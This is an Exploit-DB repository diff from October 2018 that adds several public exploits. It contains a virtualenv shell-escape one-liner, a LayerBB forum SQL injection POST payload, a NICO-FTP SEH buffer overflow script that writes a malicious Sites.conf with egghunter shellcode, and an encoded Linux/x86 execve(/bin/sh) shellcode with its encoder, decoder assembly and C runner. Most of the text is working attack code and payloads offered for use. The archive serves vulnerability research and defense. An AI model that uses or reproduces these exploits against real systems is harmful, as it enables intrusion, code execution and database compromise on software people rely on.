DB: 2018-10-05

5 changes to exploits/shellcodes

virtualenv 16.0.0 - Sandbox Escape
NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)

LayerBB Forum 1.1.1 - 'search_query' SQL Injection

Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)

exploits/linux/local/45528.txt

@@ -0,0 +1,19 @@
+# Exploit Title: virtualenv 16.0.0 - Sandbox Escape
+# Date: 2018-10-02
+# Exploit Author: vr_system
+# Vendor Homepage: https://virtualenv.pypa.io/en/stable/
+# Software Link: https://virtualenv.pypa.io/en/stable/
+# Version: 16.0.0
+# Tested on: kali linux
+# CVE : CVE-2018-17793
+
+# 1 Install
+# root@kali:~#pip install virtualenv
+# root@kali:~#virtualenv test_env
+# root@kali:~#cd test_env/
+# root@kali:~/test_env#source ./bin/activate
+
+# 2 Sandbox escape
+
+(test_env) root@kali:~/test_env#python $(bash >&2)
+(test_env) root@kali:~/test_env#python $(rbash >&2)

exploits/php/webapps/45392.txt

@@ -32,12 +32,4 @@ Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 
 Payload sample :
-userId=1 'AND 1=1 AND '2'='2
-
-
-Mohamed Sayed
-Sr.Information Security analyst
-
-*Please make sure to encrypt any sensitive information or attachments , you
-can download my Public PGP key from* here
-<https://keys.mailvelope.com/pks/lookup?op=get&search=0x238EFF7331E6E927>
+userId=1 'AND 1=1 AND '2'='2

exploits/php/webapps/45530.txt

@@ -0,0 +1,17 @@
+# Exploit Title: LayerBB Forum 1.1.1 - 'search_query' SQL Injection
+# Exploit Author: Ihsan Sencan
+# Dork: N/A
+# Date: 2018-10-04
+# Vendor Homepage: https://layerbb.com/
+# Software Link: https://demo.layerbb.com/
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# POST /search.php HTTP/1.1
+# Host: Target
+
+search_query=S' RLIKE (SELECT (CASE WHEN (111=111) THEN 0x73 ELSE 0x28 END)) AND 'X'='X&search_submit=Search

exploits/windows_x86/local/45531.py

@@ -0,0 +1,52 @@
+# Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)
+# Date: 2018-10-04
+# Platforms: Windows
+# Author: Miguel Mendez Z
+# Vendor: Nico-FTP
+# Version: 3.0.1.19
+# Tested on: Windows XP_sp3 [es]/ Windows 7_x86 [eng]
+
+#!/usr/bin/python
+
+import struct
+
+# Bad Byte: \x0a\x0b\x0c\x0d\x0e\x0f\x5d
+happy = (
+	"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
+	"\x05\x5a\x74\xef\xb8\x30\x52\x31\x53\x8b\xfa\xaf\x75"
+	"\xea\xaf\x75\xe7\xff\xe7")
+happy += "\x90"*50
+
+shell  = "\x30\x52\x31\x53"*2 # S1R0
+shell += "\x90"*8
+shell += (
+	"\x6a\x30\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
+	"\x25\xa8\xbe\x1c\x83\xeb\xfc\xe2\xf4\xd9\x40\x3c\x1c"
+	"\x25\xa8\xde\x95\xc0\x99\x7e\x78\xae\xf8\x8e\x97\x77"
+	"\xa4\x35\x4e\x31\x23\xcc\x34\x2a\x1f\xf4\x3a\x14\x57"
+	"\x12\x20\x44\xd4\xbc\x30\x05\x69\x71\x11\x24\x6f\x5c"
+	"\xee\x77\xff\x35\x4e\x35\x23\xf4\x20\xae\xe4\xaf\x64"
+	"\xc6\xe0\xbf\xcd\x74\x23\xe7\x3c\x24\x7b\x35\x55\x3d"
+	"\x4b\x84\x55\xae\x9c\x35\x1d\xf3\x99\x41\xb0\xe4\x67"
+	"\xb3\x1d\xe2\x90\x5e\x69\xd3\xab\xc3\xe4\x1e\xd5\x9a"
+	"\x69\xc1\xf0\x35\x44\x01\xa9\x6d\x7a\xae\xa4\xf5\x97"
+	"\x7d\xb4\xbf\xcf\xae\xac\x35\x1d\xf5\x21\xfa\x38\x01"
+	"\xf3\xe5\x7d\x7c\xf2\xef\xe3\xc5\xf7\xe1\x46\xae\xba"
+	"\x55\x91\x78\xc2\xbf\x91\xa0\x1a\xbe\x1c\x25\xf8\xd6"
+	"\x2d\xae\xc7\x39\xe3\xf0\x13\x4e\xa9\x87\xfe\xd6\xba"
+	"\xb0\x15\x23\xe3\xf0\x94\xb8\x60\x2f\x28\x45\xfc\x50"
+	"\xad\x05\x5b\x36\xda\xd1\x76\x25\xfb\x41\xc9\x46\xc9"
+	"\xd2\x7f\x25\xa8\xbe\x1c")
+shell += "\x90"*30
+
+lol = "ftp.pwnd.com"+" "*50
+padding = lol+"\x41"*(4132-(len(shell)+len(happy)+len(lol)))
+next_se = "\xEB\x90\x90\x90"
+seh_han = struct.pack("<I",0x00422B46) #pop ecx - pop ebp - ret 0x04 -> NicoFtp3.exe
+nops = " "*(4881-len(padding))
+ 
+payload = padding+shell+happy+next_se+seh_han+nops
+
+file = open('Sites.conf','w')
+file.write('['+payload+']\nHost=\nPort=\nUserName=\nPassword=\nAnonymous=1\nPassive=2\nUseProxy=1\nLocalDir=\nHostDir=\n')
+file.close()

files_exploits.csv

@@ -10010,6 +10010,8 @@ id,file,description,date,author,type,platform,port
 45504,exploits/windows_x86/local/45504.py,"Snes9K 0.0.9z - Denial of Service (PoC)",2018-10-01,crash_manucoot,local,windows_x86,
 45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86,
 45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux,
+45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux,
+45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)",2018-10-04,"Miguel Mendez Z",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40065,3 +40067,4 @@ id,file,description,date,author,type,platform,port
 45524,exploits/php/webapps/45524.txt,"Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection",2018-10-03,"Ihsan Sencan",webapps,php,80
 45525,exploits/hardware/webapps/45525.txt,"Airties AIR5342 1.0.0.18 - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,80
 45526,exploits/hardware/webapps/45526.txt,"RICOH MP C1803 JPN Printer - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,
+45530,exploits/php/webapps/45530.txt,"LayerBB Forum 1.1.1 - 'search_query' SQL Injection",2018-10-04,"Ihsan Sencan",webapps,php,

files_shellcodes.csv

@@ -908,6 +908,7 @@ id,file,description,date,author,type,platform
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
+45529,shellcodes/linux_x86/45529.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)",2018-10-04,"Pedro Cabral",shellcode,linux_x86
 45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
 45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
 45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86

shellcodes/linux_x86/45529.c

@@ -0,0 +1,158 @@
+/*
+# Title: Linux\x86 (NOT +SHIFT-N+ XOR-N) + encoded (/bin/sh) Shellcode (50 byes)
+# Author: Pedro Cabral
+# Purpose: spawn /bin/sh shell
+# Tested On: Ubuntu 16.04.01 LTS
+# Arch: x86
+# Size: 50 bytes
+
+##################################### sh.asm ######################################
+
+global _start
+
+section .text
+_start:
+
+	xor eax, eax	; reseting the register
+	push eax	; pushing null terminator
+	push 0x68732f2f	; push /bin//sh
+	push 0x6e69622f
+	mov ebx, esp	; ebx = /bin//sh
+	push eax
+	mov edx, esp	; envp = 0
+	push ebx
+	mov ecx, esp	; argv = [filename,0]
+	mov al, 11	; syscall 12 (execve)
+	int 0x80	; syscall
+
+############################# original shellcode ####################################
+
+pedro@ubuntu:~$ nasm -f elf32 sh.asm
+pedro@ubuntu:~$ ld -N -o sh sh.o
+pedro@ubuntu:~$ echo;objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
+
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+#################################  encode.py  #####################################
+
+#!/usr/bin/python
+
+import sys
+
+if len(sys.argv) != 3:
+        print "Usage : python encode.py <SHIFT number> <XOR number>"
+        sys.exit(0)
+
+shift   = int(sys.argv[1])
+xor     = int(sys.argv[2])
+
+#shellcode = (
+#"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\"
+#"xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+shellcode = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+# addition to the inicial of the shellcode the SHIFT and XOR values
+encoded_shellcode =""
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %shift
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %xor
+
+# [NOT + SHL-N + XOR-N] encoded shellcode
+for i in bytearray(shellcode):
+	new = ~i & 0xff
+	new = new << shift
+        new = new ^ xor
+        encoded_shellcode += '0x'
+        encoded_shellcode += '%02x, ' %new
+
+# end of shellcode
+encoded_shellcode += '0x'
+encoded_shellcode += '%02x, ' %xor
+
+# print encoded shellcode
+print encoded_shellcode
+
+#################################### Encoded Shellcode  ##########################################
+
+pedro@ubuntu:~$ python encode.py 4 1337
+0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539,
+
+#################################### decoder.asm  ###############################################
+
+global _start
+
+section .text
+
+_start:
+
+jmp short enc
+
+decoder:
+xor ecx,ecx
+mul ecx
+
+pop esi
+mov cx,[esi]
+inc esi
+inc esi
+mov bx, [esi]
+inc esi
+inc esi
+
+push esi
+mov edi, esi
+main:
+
+mov ax,[esi]
+xor ax, bx
+jz call_decoded
+shr ax, cl
+not word ax
+mov [edi], al
+inc esi
+inc esi
+inc edi
+jmp short main
+
+call_decoded:
+call [esp]
+
+enc:
+call decoder
+encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539
+
+######################################### final shellcode ###########################################
+
+pedro@ubuntu:~/encoded$ nasm -f elf32 decoder.asm 
+pedro@ubuntu:~/encoded$ ld -o decoder decoder.o
+pedro@ubuntu:~/encoded$ echo;objdump -d ./decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo 
+
+"\xeb\x2a\x31\xc9\xf7\xe1\x5e\x66\x8b\x0e\x46\x46\x66\x8b\x1e\x46\x46\x56\x89\xf7\x66\x8b\x06\x66\x31\xd8\x74\x0d\x66\xd3\xe8\x66\xf7\xd0\x88\x07\x46\x46\x47\xeb\xeb\xff\x14\x24\xe8\xd1\xff\xff\xff\x04\x00\x39\x05\xd9\x09\xc9\x06\xc9\x0f\x49\x0c\x29\x0c\x39\x08\xf9\x0d\x49\x0c\x49\x0c\x39\x08\x39\x08\xe9\x0c\x59\x0c\x59\x02\xf9\x04\xc9\x0f\x59\x02\xe9\x04\xf9\x0f\x59\x02\xd9\x04\xc9\x01\x79\x0a\x19\x06\xc9\x02\x39\x05"
+
+
+pedro@ubuntu:~/encoded$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+pedro@ubuntu:~/encoded$ ./shellcode
+Shellcode Length:  50
+$ whoami
+pedro
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x2a\x31\xc9\xf7\xe1\x5e\x66\x8b\x0e\x46\x46\x66\x8b\x1e\x46\x46\x56\x89\xf7\x66\x8b\x06\x66\x31\xd8\x74\x0d\x66\xd3\xe8\x66\xf7\xd0\x88\x07\x46\x46\x47\xeb\xeb\xff\x14\x24\xe8\xd1\xff\xff\xff\x04\x00\x39\x05\xd9\x09\xc9\x06\xc9\x0f\x49\x0c\x29\x0c\x39\x08\xf9\x0d\x49\x0c\x49\x0c\x39\x08\x39\x08\xe9\x0c\x59\x0c\x59\x02\xf9\x04\xc9\x0f\x59\x02\xe9\x04\xf9\x0f\x59\x02\xd9\x04\xc9\x01\x79\x0a\x19\x06\xc9\x02\x39\x05";
+
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}